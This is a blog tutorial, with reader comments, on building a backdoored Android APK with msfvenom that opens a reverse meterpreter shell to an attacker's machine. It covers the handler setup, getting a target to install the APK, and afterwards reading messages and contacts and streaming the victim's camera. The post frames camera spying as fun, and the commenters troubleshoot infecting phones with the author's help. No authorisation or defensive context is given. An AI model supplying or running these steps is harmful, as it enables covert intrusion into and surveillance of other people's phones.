Android is the most popular mobile platform and its users are increasing day by day, and security threat too. Android phones are vulnerable and can be easily backdoored. Metasploit is the best tool in kali linux which can generate and handle a payload. Metasploit have more than 1000 exploits which is more than enough. Now we are using metasploit to hack android. We will create a backdoor package using msfvenom. Executing the apk on target device will give you a reverse meterpreter shell.


Demo video




1. Metasploit framework


Its pre-installed in kali. If you dont find it download and install by the following command


# apt-get install metasploit-framework


Generating Payload (.apk)

Normally we use msfpayload command to generate payload, since kali 2.0 msfvenom is used over msfpayload.

# msfvenom -p android/meterpreter/reverse_tcp –platform android LHOST= “attacker IP” LPORT=444 -o /root/Desktop/payload.apk


An apk will be generated in the desktop. Attacker ip can be your local IP, but if the target is on WAN (anywhere on internet) provide your external ip and forward port 444 of your router.
Want to know how how android is hacked over dynamic DNS via wan, follow this thread on –Β
# msfvenom -p android/meterpreter/reverse_tcp –platform android LHOST= LPORT=444 -o /root/Desktop/payload.apk
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8496 bytes
Saved as: /root/Desktop/payload.apk


Setting up reverse handler

Now start msf reverse handler on your kali machine. Fire up metasploit

# msfconsole

Wait for a minitue, msfconsole will come up. Use handler then, set payload and option.

1. Handler

msf> use multi/handler

2. set payload

msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp

3. Set local port

msf exploit(handler) > set LPORT 444

4. Set local host

msf exploit(handler) > set LHOST “attacker ip”

5. exploit

msf exploit(handler) > exploit

Wait for the target to connect back

msf exploit(handler) > exploit
[*] Started reverse handler on
[*] Starting the payload handler…


Executing the payload on Target

To make a reverse connection you have to execute the payload on target device. If you have direct access to the target device, copy the apk that you have created and install it. Else upload it to some server and give the link and make him install the apk.

Now come back to our handler. If the target has executed it, a meterpreter shell will be spawned. Now you are the owner of the system!

[*] Started reverse handler on
[*] Starting the payload handler…
[*] Sending stage (56173 bytes) to
[*] Meterpreter session 1 opened ( -> at 2015-12-08 04:50:59 -0500
meterpreter >

Now you can read messages, contacts, call log, Access camera and mic, upload and download files

help command for more options

meterpreter > help

The most interesting part which i like is spying the camera.


meterpreter > webcam_stream

By this command you can have a live stream on the main camera. Even though the frame rate is low you can spy them like a James bond movie. You can also spy on front camera or the secondary camera by the command


meterpreter > webcam_stream 2

Happy hacking !

Susmith Krishnan

I’m a computer enthusiast basically and i love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and i would like to explore security vulnerabilities and latest tech news and wanna share with you


Viviana Soderquist · July 8, 2016 at 9:47 am

whoah this blog is wonderful i really like reading your posts. Stay up the great paintings! You realize, many individuals are hunting around for this info, you can help them greatly.

    admin · July 8, 2016 at 10:10 am

    Thank you. I know the struggle being a noob in hacking, so i thought of sharing what i have got. Pls keep sharing πŸ™‚

shasi · July 8, 2016 at 7:16 pm

this blog awesome for noobs…i’m created payload app ..but this is not installing on my sony s mobile …shows app not installed to over come this problem

    susmith HCK · July 8, 2016 at 10:39 pm

    some phones have this trouble. im researching on it. some devices prevent installation from unknown sources.

Shasi · July 8, 2016 at 11:06 pm

some mobiles are accepting the installation .i hav installed it one mobile ..started exploit but it stucked on starting the payload handler…victim mobile connected WLAN network but payload is not working …is there any fault …i’m using local ip address…how to find the external ip address …any solution for this

    susmith HCK · July 11, 2016 at 11:27 am

    problem with the kali machine?

Dem · November 16, 2016 at 6:10 am

If you deleted the apk file on your mobile, does the backdoor/payload still affects the android mobile?

    susmith HCK · November 16, 2016 at 5:30 pm

    no. once its deleted, it wont affect anymore.

conrad · December 7, 2016 at 5:06 am

does it support on Ubuntu 16.04? coz everytime i tried to install metasploit on terminal i got an error ” Unable to locate package metasploit-framework”

madhavan · October 15, 2017 at 7:41 pm

bro, my phone runs on android 4.2.1 jellibean.and the the app that i created doset works on it ….plz help me out…!

Elliot · November 6, 2017 at 8:59 pm

I followed the steps and reached till the step where Meterpreter session is opened, after running the payload app in the mobile. But there after, it gets stuck. meterpreter console doesn’t show up as shown in the video and images. So, I can’t move further.

Comments are closed.